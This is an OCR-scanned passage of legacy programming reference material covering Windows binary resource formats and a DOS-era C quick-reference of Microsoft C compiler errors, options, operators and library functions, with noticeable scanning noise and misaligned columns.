WORD dfMaxWidth; 
BYTE dfFirstChar; 
BYTE dfLastChar; 
BYTE dfbefaultChar; 
BYTE dfBreakChar; 
WORD dfwidthBytes; 
DWORD dfDevice; 
DWORD dfFace; 
DWORD dfReserved; 
char szDeviceName[]; 
char szFaceName[]; 


té 
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4.8 String Table Resources 


These tables are constructed in blocks of 16 strings. The 
organization of these blocks of 16 is determined by the IDs given to 
the various strings. The lowest four bits of the ID determine a 
string's position in the block. The upper twelve bits determine 
which block the string is in. Each block of 16 strings is stored as 
one resource entry. Each string or error table resource block is 
stored as follows: 


[Normal resource header (type = 6 for strings)] 


[Block of 16 strings. The strings are Pascal style with a WORD 
length preceding the string. 16 strings are always written, even 
if not all slots are full. Any slots in the block with no string 
have a zero WORD for the length.] 


It is important to note that the various blocks need not be written 

out in numerical order in the resource file. Each block is assigned 
an ordinal ID. This ID is the high 12 bits of the string IDs in the 
block plus one (ordinal IDs can't be zero). The blocks are written 

to the .RES file in the order the blocks are encountered in the .RC 

file, while the CVTRES utility will cause them to become ordered in 

the COFF object, and hence the image file. 


4.9 Accelerator Table Resources 


An accelerator table is stored as a single resource. Multiple 
accelerator tables are also allowed. The format of an accelerator 
table is very simple. No header for the table is used. Each entry 
in the table has a single four word entry. The last entry in the 
table is flaged by the hex value 0x0080 (fFlags |= 0x0080). Since 
all entries are fixed length, random access can be done because the 
number of elements in the table can be computed by dividing the 
length of the resource by eight. Here is the structure of the table 
entries: 


[Normal resource header (type = 9)] 


The following structure is repeated for all accelerator table 
entries. 


struct AccelTableEntry { 
WORD fFlags; 
WORD wAscii; 


WORD wId; 
WORD padding; 
}; 


4.10 User Defined Resources and RCDATA 


RC allows the programmer to include resources not defined in Windows. 
The user may choose a name not defined as a standard type and use it 
to include data that is to be used as a resource. This data may be 
taken from an external file or may be placed between BEGIN and END 
statements. As an option, the programmer can define the type as 
RCDATA with the same results. 


As might be imagined, the format of this resource is very simple 


because the resource compiler knows nothing about the logical 
structure of the data. Here is the organization: 
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[Normal resource header (type = 10 for RCDATA, named types 
represent user-defined types)] 


[The data from the BEGIN ... END or from the external file is 
included without translation into the .RES file] 


4.11 Name Table and Error Table Resources 


Name tables and error resources are no longer supported in the 
Windows binary resource file format. 


4.12 Version Resources. 


Version resources specify information that can be used by setup 
programs to discover which of several versions of a program or 
dynamic link library to install into the system. There is also a set 
of api's to query the version resources. There are three major types 
of information stored in version resources: the main information in 
a VS_FIXEDFILEINFO structure, Language information data in a variable 
file information structure (VarFileInfo), and user defined string 
information in StringFileInfo structures. For Windows 32, the 
strings within the version information resource is stored in Unicode, 
providing localization of the resoruces. Each block of information 
is dword aligned. 


The structure of a version resource is depicted by the 
VS_VERSION_INFO structure. 


VS_VERSION_INFO { 


WORD wLength; /* Length of the version resource */ 

WORD wValueLength; /* Length of the value field for this block */ 
WORD wType; /* type of information: 1==string, 0==binary */ 
WCHAR szKey[]; /* Unicode string KEY field */ 

[WORD Padding1;] /* possible word of padding */ 

VS_FIXEDFILEINFO Value; /* Fixed File Info Structure */ 

BYTE Children[]; /* position of VarFileInfo or StringFileInfo data */ 


}i 

The Fixed File Info structure contains basic information about the 
version, including version numbers for the product and file, and type 
of the file. 


typedef struct tagVvS_FIXEDFILEINFO { 


DWORD dwSignature; /* signature - always 0Oxfeef04bd */ 

DWORD dwStrucVersion; /* structure version - currently 0 */ 
DWORD dwFileVersionMs; /* Most Significant file version dword */ 
DWORD dwFileVersionLS; /* Least Significant file version dword */ 


DWORD dwProductVersionMS; /* Most Significant product version */ 
DWORD dwProductVersionLS; /* Least Significant product version */ 


DWORD dwFileFlagMask; /* file flag mask */ 

DWORD dwFileFlags; /*  debug/retail/prerelease/... */ 

DWORD dwFileo0s; /* 0S type. Will always be Windows32 value */ 
DWORD dwFileType; /* Type of file (dll/exe/drv/... )*/ 

DWORD dwFileSubtype; /* file subtype */ 

DWORD dwFileDateMS; /* Most Significant part of date */ 

DWORD dwFileDateLS; /* Least Significant part of date */ 


} VS_FIXEDFILEINFO; 

The user defined string information is contained within the 
StringFileInfo structure, which is a set of two strings: the key and 
the information itself. 


StringFileInfo { 
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WCHAR szKey[]; /* Unicode "StringFileInfo" */ 
[WORD padding;] /* possible padding */ 
StringTable Children[]; 


}i 
StringTable { 
WCHAR szKey[]; /* Unicode string denoting the language - 8 bytes */ 
String Children[]; /* array of children String structures */ 
} 
String { 
WCHAR _szKey[]; /* arbitrary Unicode encoded KEY string */ 
/* note that there is a list of pre-defined keys */ 
[WORD padding;] /* possible padding */ 
WCHAR Value[]; /* Unicode-encoded value for KEY */ 
} String; 


The variable file info (VarFileInfo) block contains a list of 
languages supported by this version of the application/dll. 


VarFileInfo { 


WCHAR szKey[]; /* Unicode "VarFileInfo" */ 
[WORD padding;]; /* possible padding */ 
Var Children[]; /* children array */ 
3; 
Var { 
WCHAR szKey[]; /* Unicode "Translation" (or other user key) */ 
[WORD padding;] /* possible padding */ 
WORD Value[]; /* one or more values, normally language id's */ 
3; 


4.13 Messagetable Resources. 


A message table is a resource that contains formatted text that is 
used to display an error message or messagebox. It has taken the 
place of the error table resource (which was never used). The data 
consists of a MESSAGE_RESOURCE_DATA structure, which contains one or 
more MESSAGE_RESOURCE_BLOCKS, which in turn may consist of one or 
more MESSAGE_RESOURCE_ENTRY structures. The structure is similar to 
that of the STRINGTABLE resource. 


typedef struct _MESSAGE_RESOURCE_DATA { 
ULONG NumberOfBlocks; 
MESSAGE_RESOURCE_BLOCK Blocks[]; 
} MESSAGE_RESOURCE_DATA, *PMESSAGE_RESOURCE_DATA; 


typedef struct _MESSAGE_RESOURCE_BLOCK { 
ULONG LowId; 
ULONG HighId; 
ULONG OffsetToEntries; 
} MESSAGE_RESOURCE_BLOCK, *PMESSAGE_RESOURCE_BLOCK; 


typedef struct _MESSAGE_RESOURCE_ENTRY { 
USHORT Length; 
USHORT Flags; 
UCHAR Text[]; 
} MESSAGE_RESOURCE_ENTRY, *PMESSAGE_RESOURCE_ENTRY; 


If the Flags USHORT is MESSAGE _RESOURCE_UNICODE (value 0x0001), the 


string is encoded in UNICODE rather than ASCII in the current 
codepage. 
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@C Programming Topics 
:C declarations 
AComplex C Declarations 


int i; i as an int 

int *i; i as a pointer to an int 

int **i; i is a pointer to a pointer to an int 

int *(*i)(); i is a pointer to a function returning a 
pointer to int 

int *(*i[])(); i is an array of pointers to functions 
returning pointers to an int 

int *i[5]; i is an array of 5 pointers to int 

int (*i)[5]; i is a pointer to an array of 5 ints 

int *i(); i is a function returning a pointer to an int 

int (*i)(); i is a pointer to a function returning int 


int *(*(*i)())[5] i is a pointer to a function returning a 


pointer to an array of 5 pointers to an int 


:C errors (MSC):MSC errors 
AMicrosoft C Compiler Fatal Errors 


C1000 
C1001 
C1002 
C1003 
C1004 
C1005 
C1006 
C1007 
C1008 
C1009 
C1010 
C1011 
C1012 
C1014 
C1016 
C1018 
C1019 
C1020 
C1021 
C1022 
C1023 
C1024 
C1026 
C1027 
C1028 
C1031 
C1032 
C1033 
C1035 
C1036 
C1037 
C1039 
C1040 
C1041 
C1042 
C1043 
C1044 
C1047 
C1048 
C1049 
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unknown fatal error; contact Microsoft 

internal compiler error; contact Microsoft 

compiler out of heap space in C2.EXE 

error count exceeded; stopping compilation 

unexpected end-of-file found; disk full or unmatched #if 
string too big for buffer 

compiler intermediate file create/write error 

invalid option on compiler command line 

no source file specified 

macros nested too deeply 

macro expansion exceeded available space 

macro definition too large 

unmatched parenthesis in preprocessor directive 
nesting of #include's exceed 10-level nesting limit 
#ifdef & #ifndef directives expect an identifier 
unexpected #elif; #elif without #if directive 
unexpected #else; #else without #if directive 
unexpected #endif; #endif without #if directive 
invalid preprocessor command 

expected #endif; #if directive not terminated by #endif 
can't open specified source file 

can't open specified include file 

parser stack overflow; module too complex 

DGROUP default data allocation exceeds 64K 

modules far data segment allocation exceeds 64K (QC) 
function calls nested too deeply 

can't open object listing file 

can't open assembly language output file 

expression too complex; must be simplified 

can't open source listing file 

can't open object file 

unrecoverable heap overflow in Pass 3 (post-optimizer) 
unexpected EOF in source file; file disappeared 

can't open intermediate file; no free file handles 
can't open intermediate file; invalid TMP environment var 
can't open intermediate file; unknown error 

no disk space available for intermediate file 

compiler option was specified too many times 

unknown option specified 

invalid numerical argument 


C1050 
C1052 
C1053 
C1054 
C1055 
C1056 
C1057 
C1059 
C1060 
C1062 
C1063 
C1064 
C1068 
C1069 
C1070 
C1071 
C1072 
C1090 
C1015 
C1126 
C1127 


code segment too large; within 36 bytes of 64K 
#i1f/#ifdef nested too deeply; max of 32 levels 
struct/union nested too deeply; max of 15 

initializers nested too deeply; max from 10 to 15 levels 
out of keys; file has too many symbols 

out of macro expansion space; macro to large/complex 
unexpected EOF in macro expansion or missing ')' 
compiler has run out of near heap space 

compiler has run out of far heap space 

error writing preprocessor output file for /P option 
compiler stack overflow; module too complex 

identifier too long causing token to overflow internal buffer 
can't open file specified file 

file write error on specified file; disk space low 
mismatched #if/#endif pair; missing #endif 

unexpected EOF found in comment; missing end of comment 
can't read indicated file 

data allocation exceeds 64K on _based allocation 

can't open include file (check name, searchpath and FILES=) 
automatic allocation (local variable) exceeds size 
segment redefinition; overwritten by specified segment 


AMicrosoft C Compiler Nonfatal Errors 


C2015 
C2016 
C2017 
C2018 
C2019 
C2021 
C2022 
C2025 
C2026 
C2027 
C2028 
C2030 
C2031 
C2033 
C2034 
C2035 
C2037 
C2038 
C2055 
C2056 
C2057 
C2058 
C2059 
C2060 
C2061 
C2062 
C2063 
C2064 
C2065 
C2066 
C2067 
C2068 
C2069 
C2070 
C2071 
C2072 
C2092 
C2093 
C2094 
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too many characters in constant; escape sequence too large 
missing closing single quotation mark on code line 

illegal escape sequence; occurred outside of string 

unknown character found in source file 

expected preprocessor directive; # followed by non-directive 
expected exponent value but found non-numeric character 
octal value following '\' is too large for a single character 
given identifier redefines enum, struct or union tag 

given identifier already used as enum constant 

given identifier refers to undefined enum, struct or union 
struct/union member needs to be inside a struct/union 
identifier used more than once in struct or union tag 
function can't be use as struct or union member 

bit field can't be declared as a pointer or use indirection 
type of host bit field is too small for number of bits 

given structure or union has undefined size 

undefined struct or union identifier on left of -> or 
identifier is not a struct or union member 

expected formal-parameter list instead of argument-type list 
illegal expression; possibly from previous unreported problem 
expected constant expression 

expected integral constant expression 

invalid token caused a syntax error 

syntax error; EOF found before expected token 

identifier caused syntax error 

unexpected type 

identifier is not a function but used as such 

term does not evaluate to a function pointer 

identifier not defined 

illegal cast to function type 

illegal cast to array type 

illegal cast type used in expression 

cast of void term to non-void is invalid 

illegal sizeof operand; must be expression or type name 
illegal storage class for identifier 

attempt to initialize a function identifier 

arrays of functions illegal; use array of ptrs to function 
can't use address of auto variable as static initializer 
label was undefined in function 


C2095 
C2096 
C2097 
C2098 
C2099 
C2100 
C2101 
C2102 
C2103 
C2104 
C2105 
C2106 
C2107 
C2108 
C2109 
C2127 
C2128 
C2129 
C2130 
C2131 
C2132 
C2133 
C2134 
C2136 
C2137 
C2139 
C2140 
C2141 
C2143 
C2144 
C2145 
C2146 
C2147 
C2162 
C2163 
C2164 
C2165 
C2166 
C2167 
C2168 
C2169 
C2170 
C2171 
C2172 
C2173 
C2174 
C2176 
C2177 
C2178 
C2179 
C2207 
C2208 
C2209 
C2210 
C2211 
C2212 
C2213 
C2214 
C2215 
C2216 
C2217 
C2218 
C2219 
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void argument cannot be passed to function; (void *) may 
struct & union comparison is illegal; compare members 
illegal initialization 

expected address as initialization expression 

non-constant initializer 

illegal indirection; * applied to a non-pointer value 
address of operator '&' used on constant; requires lvalue 
address of operator '&' requires lvalue 

address of operator '&' can't be used on a register variable 
address of operator '&' used on bit field not allowed 
operator needs lvalue 

left side of an operation must be lvalue 

subscript applied to expression didn't evaluate to pointer 
non-integral expression used as array subscript 

subscript used on non-array variable 

allocation for function parameters exceeds 32K 

array crosses 2 segments & element size not power of 2 
static function referenced was never defined 

#line expected string containing file name; found other 
more than one memory attribute applied to and identifier 
syntax error : unexpected identifier 

attempt to declare an unsized array as a local variable 
struct or union too large; exceeded 64k 

prototype must have a valid type for each variable 

use of empty character constant '' is illegal 

more than one type used in a variable declaration 

argument can't be a function 

enum constant value out of int range 

expected 'token1' before 'token2' or missing ')', '}' or ';' 
expected 'token' before 'type' or missing ')', '}' or ';' 
expected 'token' before identifier or declaration missing ';'! 
expected 'token' before identifier 

increment of index or array pointer with unknown base type 
token following stringizing operator # isn't formal parameter 
function in pragma not available as intrinsic function 
intrinsic function not declared before use wit /0i option 
_pascal, _cdecl, _???? keywords can't modify pointers to data 
attempt to modify item declared as const; lvalue is constant 
too many parameters in call to an intrinsic function 

too few parameters in call to an intrinsic function 
function definition for function already declared intrinsic 
intrinsic pragma used for function without intrinsic form 
unary operator used on illegal operand type 

non-pointer argument passed to a function expecting pointer 
non-pointer argument passed to a function expecting pointer 
cant pass parameter with void type to function 

static huge data not supported by /qc; use halloc() 
constant too large for data type 

storage class for same_seg pragma variables must be extern 
same_seg pragma variable class has changed from extern 
middle member of struct/union has zero-sized array 

enum, struct or union defined w/o members using /Za option 
type cast used in based construct must be (_segment) 

base in _based declarator must be near/far data pointer 
item cast in based declarator can't be a function 

_based not available for functions or pointers to functions 
symbol used as base must be type _segment, near far pointer 
_based pointer based on void can't be de-referenced; use :> 
:> operator only for objects based on void 

given function attributes are incompatible 

function attribute requires another attributes also 

type in _based construct must be void 

const/volatile appeared where type or qualifier not allowed 


C2220 
C2221 
C2222 
C2223 
C2411 
C2412 
C2413 
C2414 
C2415 
C2416 
C2417 
C2418 
C2419 
C2420 
C2421 
C2422 
C2424 
C2425 
C2426 
C2427 
C2429 


no object file generated; warning treated as error due to /WX 
left operand of '.' is pointer to struct/union, must use '->' 
left operand of '->' is struct or union, must use '.' 

left operand of '->' must be pointer struct or union 
identifier is not a member of the specified struct or union 
identifier redefined within current function 

alignment size used with ALIGN directive missing or invalid 
illegal number of operands in assembly code; see /G1 & /62 
improper operand type 

illegal opcode for processor in assembly code; see /G1 & /62 
divisor used within the given context is zero 

in-line asm identifier referenced as register and isn't 
divisor argument to mod is zero in given context 

given identifier is illegal in this context 

PTR must not be used with register operand in this context 
illegal segment override used in given context 

given token used to form improper expression in this context 
token used fto form non-constant expression in this context 
given token is illegal operator in this context 

jump referencing label is out of range 

FAR PTR can't be use on jmp or call to label 


AMicrosoft C Command-Line Errors 


D2000 
D2001 
D2002 
D2003 
D2008 
D2011 
D2012 
D2013 
D2018 
D2019 
D2020 
D2021 
D2022 
D2027 
D2028 
D2030 
D2031 


unknown CL command line error; contact Microsoft 

too many symbols predefined with /D; max is 30 
memory-model specification conflict; only 1 allowed 
missing source file name for CL command 

option specified too many times 

more than one /FP option specified; only 1 allowed 

too many linker flags in command; max of 128 flags/files 
incomplete model specification in /A: 

can't open linker response file 

can't overwrite source with object file; output = input 
/Gc requires extended keywords be enabled via /Ze 
invalid numerical argument; numeric args must be < 65534 
can't open help file for /HELP 

CL could not execute one of the compiler components 

too many open files; can't dup/redirect specified stream 
internal compiler component error; contact Microsoft 

too many flags/files in command; max of 128 arguments to CL 


AMicrosoft C Command-Line Warning 


D4000 
D4001 
D4002 
D4003 
D4005 
D4007 
D4009 
D4011 
D4012 
D4013 
D4014 
D4018 
D4019 


unknown command line warning in CL; contact Microsoft 
listing overrides assembly output; /Fc and /Fa used together 
unknown flag ignored by CL command 

multiple processors selected for code generation 

CL could not locate compiler component 

/C must be used in conjunction with /P or /E or /EP 
threshold valid for far/huge data models only; /Gt ignored 
preprocessor listing specified; source listing not generated 
function prototyping specified; source listing not generated 
combined listing /Fc overrides object listing /Fl 

invalid value for option; default value used 

.DEF files supported in 0S/2 only (/Lr /Lc) 

string too long for /ND, /NT, /NM, /St, /Ss option of CL 


AMicrosoft Link Errors (incomplete list) 


L2002 


fixup overflow (probably incompatible memory models .0BJS) 


AMicrosoft C Floating-Point Math Errors 
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M6101 
M6102 
M6103 
M6104 
M6105 
M6106 
M6107 
M6108 
M6110 
M6111 


invalid operation occurred; usually NAN or infinity problem 
denormal; significance loss with very small generated number 
attempt to divide by zero in floating-point operation 
overflow in floating-point operation 

underflow occurred in floating-point operation 

inexact; loss of precision occurred in FP operation 
unemulated/unsupported 8087/287/387 instruction executed 
square root operand somehow became negative; C won't allow 
coprocessor or emulator stack overflow 

stack underflow due to unretrieved double return values 


AMicrosoft C Run-Time Errors 


R6000 
R6001 
R6002 
R6005 
R6006 
R6007 
R6008 
R6009 
R6010 
R6012 
R6013 
R6016 
R6017 


stack overflow; stack needs enlarged or problem program 
null pointer assignment, NULL segment modified 
floating-point support not linked into executable 

not enough memory to load child process (EXEC) 

target executable is not a valid executable (EXEC) 
invalid environment on exec of child process (EXEC) 

not enough space for argument vector after program loads 
not enough space for environment after program loads 
abnormal program termination 

illegal null near-pointer use 

illegal out of range far-pointer use 

not enough space for thread data 

unexpected multithread lock error 


:cl:MSC options 
AMicrosoft C Options (v6.0) 


% CL [options] [filenames] [libraries link-options] 
/AT Tiny Memory Model; combined code and data limited to 64K 
/AS Small Memory Model; code and data limited to 64K each 
/ AM Medium Memory Model; data is limited to 64K 
/AC Compact Memory Model; code is limited to 64K 
/AL Large Memory Model; unlimited code and data but arrays 
are limited to 64K 
/ AH Huge Memory Model; unlimited code, data and array size 


/Astring where string is compose of the following: 


% 


% 


% 


/B1[path] used to 


/B2 
/B3 
/C 
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Control 
pointers are near 
pointers are far 


Code Pointer 
SÌ all code 
l all code 


Control 

pointers are near 
pointer are far 
pointers are huge 


Data Pointer 
n all data 
f all data 
h all data 


Segment Setup Control 


d stack segment (SS) defaults to data segment (DS) 

u stack segment (SS) is not equal to data segment (DS); 
DS is loaded on function entry 

w. stack segment (SS) is not equal to data segment (DS); 


DS is NOT loaded on function entry 

invoke the large version of the compiler C1L.EXE; 
normally used when the compiler runs out of heap space 
invokes large compiler version pass 2 

invokes large compiler version pass 3 

preserves file comments when preprocessing a file 


/c do not link, create .0BJ file only 

/D<string> defines string as a preprocessor constant. If string is 
of the form "ID=xxx" then "ID" represents the value "xxx" 
If no equals sign is present, "ID" has the value 0.If 
an equals sign is present without a value, ID has the 


value 1. 

/E output from preprocessor is written to stdout with 
interspersed #line directives. 

/EP output from preprocessor is written to stdout without, 


adding #line directives. 

/F<size> sets stack to <size> bytes. Size must be hexadecimal. 

/Fa[file] generate assembly listing. Filename defaults to source 
file with .ASM extension. 

/Fb<file> creates bound executable. Should be used only with /Lp. 

/Fc[file] generates combined assembly/source listing.The filename 
defaults to the source file name with the .COD extension. 

/Fe<file> creates the executable with specified name 

/Fl[file] generates object code listing. Default file name is the 
source file name with a .COD extension. 

/Fm[file] generate a link MAP file. Default file name is the source 
file name with the extension .MAP. 

/Fo<file> generate and object file using the name <file>. 


/FPa generates floating point calls and selects the alternate 
math library. 

/FPc generates floating point calls and selects the emulation 
library. 

/FPCc87 generates floating point calls and selects the 80x87 
library. 

/FPi generates inline 80x87 instructions and selects the 80x87 
library. Default floating point option. 

/FPi87 generates floating point calls and selects the 80x87 
library. 


/Fr[file] generates a standard PWB Source Browser Database. The 
default name is the source file with the .SBR extension. 
/FR[file] generates a standard PWB Source Browser Database. The 
default name is the source file with the .SBR extension. 


/FS generate a source file listing with .LST extension. 

/FX generate a cross reference listing with .CRF extension. 

/G0 generate code using 8088/8086 instruction set 

/G1 generate code using 80188/80186 instruction set 

/62 generate code using 80286 instruction set 

/Gc generate code using FORTRAN/PASCAL calling and naming 
conventions 

/Gd generate code using standard C calling and naming 
conventions (default) 

/Ge generate code using stack checking routines (default) 

/Gi incremental compile if used with /qc; only functions that 
have changed are compiled; implies /Li option 

/Gm strings are generated in the CONST segment 

/Gr _fastcall functions are enabled. Parameters can be 
passed via registers instead of on the stack 

/GS suppress generation of stack checking code 


/Gt[num] places data items larger than "num" bytes into different 
segments. The default value for "num is 256 bytes. 

/Gw generate Windows functions entry/exit code 

/GW generates more efficient Windows functions entry/exit 
code. Use /Gw for callback routines. 

/H<num> external name length restriction (default 31) 

/HELP. calls QuickHelp utility. ‘help is also valid. 

/I<path> inserts <path> in front of current include search path 

/I all chars should be unsigned (default is signed) 

/Lc linker is to generate compatibility mode programs. 

/Li[num] incremental link using ILINK instead of LINK. Results 
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in larger EXE size. 
/Lp linker is to generate protected mode executable. 
/Lr linker is to create real mode executable. 
/link <info> passes library names in <info> to LINK 
/MA<opt> passes <opt> to MASM if .ASM files found on command line 


/MD creates Dynamic Link Library for 08/2; The same as: 
/ALw /FPi /62 /DDLL /DMT. No library search record is defined 
/ML links the C run-time library as part of the Dynamic Link 


Library. The library search record is set to LLIBCDLL.LIB. 


/MT enable multithread program support in 0S/2 
/ND<dseg> set data segment name to <dseg> 

/NM<name> set module name to <name> 

/nologo suppress sign-on banner display 

/NT<name> set code segment name to <name> 

/O[opts] where "opts" is a string containing the following: 


relax alias checking 

enable block level local common expressions 
disable all optimizations 

enable global register optimization 

enable global optimizations and global common 
expressions 

enable generation of intrinsic functions 

enable loop optimization 

disable unsafe loop optimization (default) 

improve consistency in floating-point calculations 
disable inline returns from functions 

optimize for size 

optimize for speed (default) 

assume no aliasing except across function calls 
maximize optimization (/0Ocegilt/Gs) 

enable maximum loop and global-register allocation 
optimization 


QD0I0 dd 


NXE 1UV0G5O0I5FHEW 


/P preprocess source generating .I intermediate file 

/qc quick compile option. Incompatible with the following 
options: /Fa /Fc /Fl /FPa /FPc /FPc87 /Fs /Gm /H /0w /Zc 

/Sl<wid> set listing file line width to <wid> (79-132, default 79) 

/Sp<len> set page length (15-255, default 63) 

/Ss<stitle> set source listing subtitle 

/St<title> set source listing title 

/Ta<file> <file> is to be treated as an assembler source file 
regardless of the file extension 

/Te<file> <file> is to be treated as an C source file regardless 
of the file extension 


/Uu undefines all predefined indentifiers 

/U<id> undefines <id> predefined indentifier 

/V<ver> version string <ver> is copied to the .0BJ file 

/W suppress compiler warnings (same as /WO0) 

/WO suppress compiler warnings 

/W<n> warning level (1..4) 1=fewer, 4=more warnings (default 1) 

/WX all warnings should be treated as fatal 

/X ignore standard places in include path search 

/Za disables Microsoft language extensions insuring ANSI 
code compatibility 

/Zc pascal functions are to be case insensitive 

/Zd generate line number information for debuggers 

/Ze enable Microsoft C language extensions 

/Z9 generate function prototypes and display via stdout 
without compiling. 

/Zi generate symbolic debugging information 

/ZI suppress library search record generation 
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/Zp1 structures are not to be packed (Turbo C default) 


/Zp2 pack structure on word boundaries 
/Zp4 pack structure on dword boundary 
/Zr generate code to check null pointers and out of range 


far pointers 
/zs<file> perform syntax check only 


% Environment Variables 
CL default input files and command line options 
INCLUDE paths to search for include files (separated by ";") 
LIB paths to search for library files (separated by ";") 
LINK command line options for link 
TMP path where temporary files are created 


:C escape sequences 
AC Escape Sequences 


\a Bell 

\b Backspace 

\f Form feed 

\n Line feed 

\r Carriage return 
\t Horizontal tab 
\V Vertical tab 

\'! Single quote 

\" Double quote 

\\ Backslash 

\0 NULL character 
\7 Bell 

\ddd Octal value 
\xddd Hexadecimal value 


:C operators:operator precedence 
AC Operators 


% Operation C Operator Associativity 
Array L] (AA ) 
Function () (AÀ ) 
Member -> (AA ) 
Member (AÀ ) 
Unary minus - ( AÀ ) 

Unary plus + ( AÀ ) 
Logical NOT ! ( AA ) 
Bitwise compliment -- ( AA ) 
Address of & ( AÀ ) 
Indirection * ( AÀ ) 
Sizeof sizeof ( AÀ ) 
Increment ++ ( AÀ ) 
Decrement -- ( AÀ ) 

Cast (type) ( AÀ ) 
Multiplication di (AÀ ) 
Division / (AA ) 
Modulus % (AÀ ) 
Addition + (AA ) 
Subtraction - (AÀ ) 

Shift right >> (AA ) 

Shift left << (AA ) 
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Greater than > (AA ) 
Greater or equal >= ( AÀ ) 

Less than < (AA ) 

Less or equal <= (AA ) 
Equal i (AÀ ) 

Not equal = (AÀ ) 
Bitwise AND & (AÀ ) 
Bitwise XOR A (AÀ ) 
Bitwise OR | (AÀ ) 
Logical AND && (AÀ ) 
Logical OR || (AÀ ) 
Conditional ?: ( AÀ ) 
Simple assignment = (AA 


Addition assignment += 
Subtraction assignment -= 
Multiplication assign *= 
Division assignment = 
Modulus assignment %= 
Left shift assignment << 
Right shift assignment >> 
Bitwise XOR assignment A= 
Bitwise AND assignment &= 
Bitwise OR assignment = 
Compliment assignment  —= 


DOLFECLILECE 


Sequence operator , ( AA 


—__ 


- all operations grouped together have the same precedence 
:regs:byteregs:wordregs:sregs:regpack 
ARegister Structures for Turbo C and MS C 


% Turbo C MS C 

% struct WORDREGS struct WORDREGS 
{ { 
unsigned int ax; unsigned int ax; 
unsigned int bx; unsigned int bx; 
unsigned int cx; unsigned int cx; 
unsigned int dx; unsigned int dx; 
unsigned int si; unsigned int si; 
unsigned int di; unsigned int di; 
unsigned int cflag; unsigned int cflag; 
unsigned int flags; }; 
}; 

% struct BYTEREGS 
{ 


unsigned char al; 
unsigned char ah; 
unsigned char bl; 
unsigned char bh; A same as Turbo C 
unsigned char cl; 
unsigned char ch; 
unsigned char dl; 
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unsigned char dh; 


}; 
% union REGS 


struct WORDREGS x; À same as Turbo C 
struct BYTEREGS h; 


Fa 


% struct SREGS 
i 
unsigned int es; 
unsigned int cs; A same as Turbo C 
unsigned int ss; 
unsigned int ds; 


ti 


% struct REGPACK 
i 
unsigned r_ax; 
unsigned r_bx; 
unsigned r_cx; 
unsigned r_dx; 
unsigned r_bp; Turbo C only 
unsigned r_si; 
unsigned r_di; 
unsigned r_ds; 
unsigned r_es; 
unsigned r_flags; 


}; 

:abort 
Avoid abort( void ) 

- prototype in stdlib.h & process.h 

- terminates a process & calls exit(3) 
:abs 
Aint abs( int n ) 

- prototype in stdlib.h 

- returns the absolute value of int n 
:absread 
ATC: int absread( int drive, int count, int start, void *buffer ) 

- prototype in dos.h 


- reads absolute logical disk sectors 


- drive = (0=A:, 1=B:, 2=C:, ...) 
- count = # of sectors to read 
- start = beginning logical sector number 


- buffer = address of buffer 
- TC++ accounts for DOS 4.x+ long sector values while TC 2.0 and 
earlier do not (see -INT 25-) 
- returns 0 if 0K; -1 on error; errno has DOS error number 
:abswrite 
ATC: int abswrite( int drive, int sectors, int start, void *buffer ) 
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‘ACCEess 


prototype in dos.h 


writes absolute logical disk sectors 

drive = (0=A:, 1=B:, 2=C:, ...) 

sectors = # of sectors to write 

start = beginning logical sector number 

buffer = address of buffer 

TC++ accounts for DOS 4.x+ long sector values while TC 2.0 and 
earlier do not (see -INT 25-) 

returns 0 if 0K; -1 on error; errno has DOS error number 


NAint access( const char *filename, int amode ) 


:aCOS 
Adouble 


:alloca 


prototype in io.h 
checks filename for existence & R/W access 


amode = 06 -- check for R/W permission 
04 -- check for R 
02 -- check for W 
01 -- execute (ignored) 
00 -- check if filename exists 


filename can be directory 
returns 0 if 0K 
-1 on error 
errno = ENOENT if path or filename not found 
errno = EACCES if permission denied 


acos( double x ) 


prototype in math.h 


returns arc cosine of x 
values must be in range -1 to 1 


AMSC: void *alloca( size_t size ) 


prototype in malloc.h 


allocates size bytes for the application stack 

memory is automatically freed upon exiting the calling function 
this function cannot be used as a parameter to another function 
or stack corruption will occur 

the pointer returned CANNOT be passed as an argument to free() 
since it isn't allocated from DOS 

see -stackavail- 


:allocmem 
ATC: int allocmem( unsigned size, unsigned *seg ) 


prototype in dos.h 


allocates memory in size paragraphs, where seg is pointer to 
a word containing segment address 
returns -1 if ok, else largest available memory in paragraphs 
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MS C uses _dos_allocmem 
see -INT 21,48- 


:‘asctime 
Achar *asctime( const struct tm *tm ) 


:asin 
NAdouble 


tassert 


prototype in time.h 
converts time in struct tm to 26-character ASCII string 
returns a pointer to the ASCII string 


asin( double x ) 


prototype in math.h 


returns arc sine of x 
values must be in range -1 to 1 


Avoid assert( int test ) 


:atan 
Adouble 


tatan2 
Adouble 


:atexit 


prototype in assert.h 
if test fails, prints error message & aborts program 
test can be a condition 


atan( double x ) 


prototype in math.h 


returns arc tangent of x 


tan( double y, double x ) 


prototype in math.h 


returns arc tangent of x*2 
used instead of atan when the resulting angle is near 
pi/2 or -pi/2 


NAint atexit( void func ) 


:atof 
NAdouble 


prototype in stdlib.h 


func is defined as void (*func)(void) 

calls func() before exiting to DOS 

up to 32 functions can be called (if 32 atexit calls registered) 
should be located in main & executed before anything else 
returns 0 if OK, else nonzero if no space to register function 


atof( const char *s ) 
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- prototype in math.h & stdlib.h 
- converts ASCII string to double value 
:atoi 
Aint atoi( const char *s ) 
- prototype in stdlib.h 
- converts ASCII string to integer value 
:atol 
Along atol( const char *s ) 
- prototype in stdlib.h 
- converts ASCII string to long value 
:bdos 
Aint bdos( int dosfun, unsigned dosdx, unsigned dosal ) 
- prototype in dos.h 
- make DOS system call for function dosfun, passing DX and AL 
values via dosdx and dosal 
- use only in small memory model 
- unique to DOS 
- returns value of AX set by system call 
:bdosptr 
ATC: int bdosptr( int dosfun, void *argument, unsigned dosal ) 
- prototype in dos.h 
- make DOS system call for function dosfun, passing POINTER 
to values via argument and passing AL via dosal 
- use for small or large memory models 
- returns value of AX set by system call, else -1 on failure 


(where errno & _doserrno are then set) 


:_bfree:_ffree:_nfree 


% MSC: void _bfree( _segment seg, void based(void) *block ) 
% MSC: void _ffree( void far *block ) 
% MSC: void _nfree( void near *block ) 


- prototype in malloc.h 
- block = previously allocated buffer 
- in large data memory models free() maps to _ffree() 
- in small data memory models free() maps to _nfree() 
- NULL pointer parameter is ignored 
:_bios_disk 
AMSC: unsigned _bios_disk(unsigned cmd,struct diskinfo_t *dskinfo) 


- prototype in bios.h 
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_DISK_VERIFY verify disk sectors (INT 13,4) 
_DISK_FORMAT format disk track (INT 13,5) 


- cmd = _DISK_RESET resets disk system (INT 13,0) 
= _DISK_STATUS return disk status (INT 13,1) 
